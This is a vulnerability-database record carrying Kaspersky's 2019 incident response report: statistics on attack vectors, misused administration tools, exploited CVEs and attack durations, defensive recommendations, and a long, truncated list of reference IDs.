DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "type": "securelist", "bulletinFamily": "blog", "title": "Incident Response Analyst Report 2019", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries&#x27; cyber-incident tactics and techniques used in the wild. In this report, we share our teams&#x27; conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware&#x27;s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims&#x27; environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story &quot;[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)&quot;.\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim&#x27;s organization and we have no information on all of their findings \u2013 hence the &#x27;Unknown reasons&#x27; on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that&#x27;s not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization&#x27;s network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can&#x27;t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet&#x27;s weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&amp;CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller &amp; Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary&#x27;s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary&#x27;s activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn&#x27;t have a specialist in threat hunting or they are managed by an external SOC that doesn&#x27;t have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&amp;CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "published": "2020-08-06T10:00:34", "modified": "2020-08-06T10:00:34", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "reporter": "Ayman Shaaban", "references": [], "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "lastseen": "2020-08-07T08:03:43", "viewCount": 84, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "canvas", "idList": ["BLUEKEEP", "NETSCALER_TRAVERSAL_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "cert", "idList": ["VU:619785", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-0657", "CPAI-2019-1097", "CPAI-2019-1653"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2018-7600", "CVE-2019-0594", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:426F0", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814", "DEBIAN:DSA-4156-1:CE193"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639", "E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:46904", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:E563140BD918794B55F61FC55941120F"]}, {"type": "f5", "idList": ["F5:K22854260", "F5:K25238311"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:338F0E4516B790140B04DBFA18EAAC20", "FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "31DB22CD-3492-524F-9D26-035FC1086A71", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "38A11E23-686C-5C12-93FA-4A82D0E04202", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "560405C4-4806-5173-B662-F9C3D776D8D4", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "6787DC40-24C2-5626-B213-399038EFB0E9", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BE90B1DD-521D-540C-8554-5454779256A5", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:534630", "H1:536134", "H1:591295", "H1:671749", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kaspersky", "idList": ["KLA11417", "KLA11706"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:2730308475904875028", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4421457840699592233", "KITPLOIT:4482238198881011483", "KITPLOIT:4707889613618662864", "KITPLOIT:5420210148456420402", "KITPLOIT:5485948766090500662", "KITPLOIT:5494076556436489947", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:7013881512724945934", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7835941952769002973", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:8672599587089685905", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:C93CCA23099AC250E702848B49677D5B", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-RDP-CVE_2019_0708_BLUEKEEP-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "MSF:EXPLOIT-WINDOWS-RDP-CVE_2019_0708_BLUEKEEP_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0604", "MS:CVE-2019-0708"]}, {"type": "mskb", "idList": ["KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", 